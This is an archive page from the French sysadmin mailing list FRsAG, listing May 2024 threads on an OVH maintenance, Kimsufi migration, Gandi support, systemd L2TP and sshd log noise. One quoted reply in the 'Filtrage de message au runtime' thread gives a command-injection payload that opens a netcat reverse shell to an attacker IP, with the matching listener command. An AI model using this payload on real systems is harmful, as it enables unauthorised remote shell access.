FRsAG

frsag@frsag.org

6 participants
2574 discussions

Apéro Lyonnais : lundi 13 mai 2024
by Camille 13 May '24

13 May '24

Bonjour Pour ce mois ci, on aura une semaine de retard, et c'est donc ce soir ce lundi 13 mai qu'aura lieu le prochain apéro. Je vous attends donc ce soir soir pour un apéro lyonnais et ses environs au : Malting-Pot 263 Grande Rue de la Guillotiere, 69007 soit ce lundi 13 mai 2024 dès 19h. Et toujours vaguement des infos sur : http://www.agendadulibre.org/tags/araas https://www.meetup.com/fr-FR/Auvergne-Rhone-Alpes-Apero-Admin-Sys/ Km

1 0

systemd networkd et L2TP
by Tr4sK 09 May '24

09 May '24

Bonjour, Ca fait quelques temps que je me gratte la tête sur la création d'un NetDev l2tp avec systemd-networkd Je commence le ficher par [NetDev] Kind=l2tp Je parcours la doc et ajoute les options pour l2tpEncapsulationType=ip. Mais je ne vois rien arriver de pertinent dans les logs. Est-ce que quelqu'un à déja réussi à le faire tomber en marche ? J'y arrive avec les commandes ip l2tp Quelques traces de ma config et quelques tests https://paste.sh/fiKH_IFO#g9yTHCsiJYj-bccB3l3HP8uo Et pour info, j'ai tenté une mise à jour de systemd vers stable-backports sans amélioration visible. systemd/stable-backports,now 254.5-1~bpo12+3 amd64 [installé] systemd/stable 252.22-1~deb12u1 amd64 Bon weekend :)

1 0

[Kimsufi] Migration vers OVHCloud Eco
by Michaël Costa 04 May '24

04 May '24

Bonjour à toutes et tous, J'ai récemment commandé un nouveau serveur Kimsufi en complément des deux serveurs dédiés que je loue déjà et j'ai été surpris de m'apercevoir que ce nouveau serveur n'apparaît pas dans le dashboard de mon compte Kimsufi mais dans celui de mon compte OVHCloud. D'après la KB0043466 https://help.ovhcloud.com/csm/fr-dedicated-servers-ovhcloud-control-panel-g…, il semble que les gammes Kimsufi et So you Start soient dorénavant regroupées sous la dénomination "Eco" d'OVHCloud. Ça fait sens d'un point de vue business et en tant que tel cela ne me pose pas plus de problème que ça mais pour faciliter la gestion de mes serveurs je souhaiterai y accéder au travers d'une interface unique. Je n'ai trouvé aucune KB qui expliquerait comment migrer un serveur existant de Kimsufi à OVHCloud Eco pas plus que de bouton pour "exporter" ou "importer" de l'un vers l'autre mais je suis peut-être passé à coté. Quelqu'un sur cette liste saurait-il si c'est possible ? Si oui, comment faire ? Autres questions: - Si l'objectif d'OVH est de rationaliser/uniformiser la gestion de ces espaces clients et de ces offres, une migration automatique vers le dashboard OVHCloud est-elle prévue ? Si oui, à quelle échéance ? Merci pour vos réponses éclairées. -- Michaël Costa MCO System https://www.mcos.nc Architecture et administration système Unix/Linux DevOps, Formation et Maintien en Condition Opérationnelle Mail: michael.costa(a)mcos.nc GSM: +687 71 32 33

2 2

Re: [SPAM] Re: Filtrage de message au runtime
by Ludovic Levet 02 May '24

02 May '24

Le minimum que l'on fait pour un serveur web frontal de ce type est de mettre en place le mod_security d'apache avec les customs rules qui vont bien ... Et d'y ajouter le bon core rule set : https://github.com/coreruleset/coreruleset J'ai quand même fait l'essai sans le mod_security et ta proposition ne fonctionne pas ... Ce qui ne m’étonne pas car il y a la rule /etc/sudoers.d/httpd Ludo. Nop, ca marche pas. Le 02/05/2024 à 06:45, Julien Reitzel a écrit : > Hello, > > au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec : > ; nc <IP attaquant> 5555 -e /bin/bash > > du côté attaquant lancer : > $ nc -lvp 5555 > > Et voilà un reverse shell simpliste qui contourne l'auth ssh. > > -- ------------------------------------------------------------------------------------------------------------------------- Ce message inclut une signature numérique. Il certifie que l'expéditeur et le contenue du message sont authentiques. Si votre logiciel de messagerie est compatible, Il doit garantir que le document n'a pas été altéré entre l'instant où l'auteur l'a signé et le moment où le lecteur le consulte. Loi n°2000-230 du 13 mars 2000 Art. 1316, 1316-1, 1316-2, 1316-3, 1316-4 du Code civil. La présence d'un fichier joint 'smime.p7s' (fichier signature) indique que votre client messagerie n'est pas compatible. -------------------------------------------------------------------------------------------------------------------------

4 6

Toc toc un support de chez Gandi ?
by Théo VARIER 02 May '24

02 May '24

Bonjour la liste, c'est une bouteille à la mer : Y a t il quelqu'un de chez Gandi sur cette liste ? Gandi m'a fourni un certificat SSL Std pour un domain sans le sous domaine www. C'est à dire que le certificat est valide pour domain.tld mais pas www.domain.tld Même en régénérant le certificat en utilisant leur ligne de commande pour générer la requête. C'est une première depuis que le service existe ! Pas de réponse à mon ticket depuis hier. Le chat en ligne ne fonctionne pas. Le telephone répond qu'il faut utiliser le formulaire en ligne ... sont ils eux aussi devenus décérébrés, pardon je veux dire, inaccessibles ? En tout cas ils sont devenus complètement hors sol en un temps record ! NB : Aller voir ailleurs n'est pas encore le projet. Merci d'avance Théo VARIER

20 52

Re: Filtrage de message au runtime
by Ludovic Levet 02 May '24

02 May '24

C'est pas faux. C'est jamais une bonne idée de donner des commandes accessible par apache. Bon après, il y a la sécurité filesystem qui fera que ce user (apache) ai le même pourvoir qu'un user lamda sur ton linux et de plus les commandes ne peuvent être utilisées que par le core apache car le mod_security ne permet pas d'utilisé quoique ce soit. Elle en aura fait du chemin cette petite chauves-souris. Et surtout sans déclencher le fail2ban (avec alertes qui vont biens) sur une url qui n'est censée être connu que par des admins. Bref. Rien n'est malheureusement infaillible. Le 01/05/2024 à 22:25, Paul Rolland (ポール・ロラン) a écrit : > Bonjour, > > On Wed, 1 May 2024 21:33:42 +0200 > Ludovic LEVET via FRsAG <frsag(a)frsag.org> wrote: > >> 3) Bon ... (Mode Bigard On ..) En admettant que la chauves-souris elle >> trouve le code de la porte , elle connaisse l’étage de ton appart et >> qu'elle connaisse aussi ton numéro de porte ben elle ouvres son ip au >> ssh et ben il lui reste plus qu'a attaquer l'auth ssh ... > Elle aura surement plus envie de regarder ce que le sudo sur echo et sed > peut lui permettre via apache et la page web ;) > > Paul >

2 2

[frsag.org] E-mail de réinitialisation de mot de passe
by greg＠frsag.org 02 May '24

02 May '24

Bonjour, c'est frsag.org ! You are receiving this e-mail because you or someone else has requested a password for your user account. However, we do not have any record of a user with email frsag(a)frsag.org in our database. This mail can be safely ignored if you did not request a password reset. If it was you, you can sign up for an account using the link below. https://frsag.org/accounts/signup/ Merci d'utiliser frsag.org ! frsag.org

1 0

Re: [SPAM] Re: [SPAM] Re: Filtrage de message au runtime
by Laurent Barme 02 May '24

02 May '24

Le 02/05/2024 à 09:16, Luc Bégault via FRsAG a écrit : > il me parrait préférable de se reposer sur du code trés surveillé comme ssh A propos, est-ce que la faille concernant lzma a été corrigée ? Y a-t-il une meilleure source d'infirmation que https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024 ? Sur ce fil le dernier message date du 22 avril sans qu'il soit clair (du moins pour moi) que le problème soit résolu…

1 0

Filtrage de message au runtime
by Stéphane Rivière 01 May '24

01 May '24

Bonjour à toutes et tous, J'ai, comme tout le monde j'imagine, de la brute force via ssh, qui déclenche le très agaçant message en console "fatal: Read from socket failed: Connection reset by peer [preauth]" Ici y'a que de la clé (et passwords invalidés) je ne peux pas filtrer sur les IP entrantes, ni changer le port 22, le plus simple me semble donc d'ignorer la chose. J'ai googlé et ducké sans succès pour voir s'il y avait un moyen de dire au démon sshd de limiter sa prose aux fichiers de logs sans polluer la console. man sshd ou man sshd_config ne m'ont rien dit de sympa (mais j'ai peut être raté une ligne). Avez-vous une opinion ? Ça serait bien de faire un ménage de printemps :) -- Stéphane Rivière Ile d'Oléron - France

10 24

OVH Maintenance éléctrique avec coupure possible sur GRA1&GRA2 le 29/04 & 02/05
by Maximilien Douchet 26 Apr '24

26 Apr '24

Bonjour, Loin de moi l'idée de créer un vent de panique avec le tag [ALERT] mais je pense que cela pourrait intéresser du monde vu l'impact potentiel de la maintenance. (Désolé également pour le doublon sur FRnOG D'après une communication de leur part il semblerais que OVH viens de planifier en urgence une maintenance électrique dans l’intégralité de ses datacenters de Gravelines (GRA1, GRA2, GRA3 & GRA4) les 29/04 et 02/05 (lundi et jeudi de la semaine prochaine S18). Un risque de coupure électrique est envisagé sur au moins les datacenters GRA1 & GRA2 d'après leur communication pendant toute la journée du 29/04 et 02/05 de 8h-16h CEST. Avec un tel risque il est préférable de procéder a une extinction des serveurs au préalable durant les deux journées de maintenance. Il n'y a pas de précisions supplémentaires quand aux serveurs double-alimentés, etc. j'imagine qu'ils sont également concernés par mesure de prudence. Une maintenance de ce type avec coupure dans un délai aussi court est aussi inédite qu'exceptionnelle je suppose que cela est fait pour des raisons très importantes. Vu la capacité des datacenters de Gravelines cela doit concerner (avec une estimation au doigt mouillé) entre 50 000 et 100 000 serveurs. J'imagine que certaines dispositions peuvent être a prendre pour les infrastructures n'étant pas redondées en dehors des datacenters de Gravelines ou au moins pour préserver vos serveurs avec une extinction préalable. Communication OVH : ****FR**** Cher client, Nous devons effectuer une maintenance électrique préventive sur le site de Gravelines la semaine prochaine. Celle-ci se déroulera en 2 étapes, avec une première opération le 29 avril 2024, et une seconde le 2 mai 2024. Cette maintenance touche les serveurs hébergés dans les environnements de Gravelines (GRA1, GRA2, GRA3 et GRA4). Aucun impact n’est attendu sur le périmètre GRA3 et GRA4. Concernant le périmètre GRA1 et GRA2, un risque de coupure électrique a été identifié. Pour vous prémunir de tout impact, nous vous conseillons au préalable d’éteindre vos machines avant chacune des opérations mentionnées ci-dessous : Opération de maintenance (No1) : Créneau : 29/04/2024 de 06:00 UTC à 14:00 UTC Datacenter : Gravelines (GRA1 / GRA2) Impact attendu : Certains serveurs pourraient subir une interruption électrique Page Status : https://network.status-ovhcloud.com/incidents/f8yhd573wk5j Opération de maintenance (No2) : Créneau : 02/05/2024 de 06:00 UTC à 14:00 UTC Datacenter : Gravelines (GRA1 / GRA2) Impact attendu : Certains serveurs pourraient subir une interruption électrique Page Status : https://network.status-ovhcloud.com/incidents/172569g1l20w Nos équipes Datacenter et Support seront mobilisées durant toute la maintenance afin de résoudre tout impact sur vos services. Nous nous excusons par avance pour toute gêne occasionnée. Sincèrement, — Maximilien Douchet Hexanode - Hébergement & Infogérance hexanode.fr - contact(a)hexanode.fr - +339 72 60 54 00

2 4

← Newer
1
2
3
4
5
6
7
...
258
Older →

Jump to page:

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

FRsAG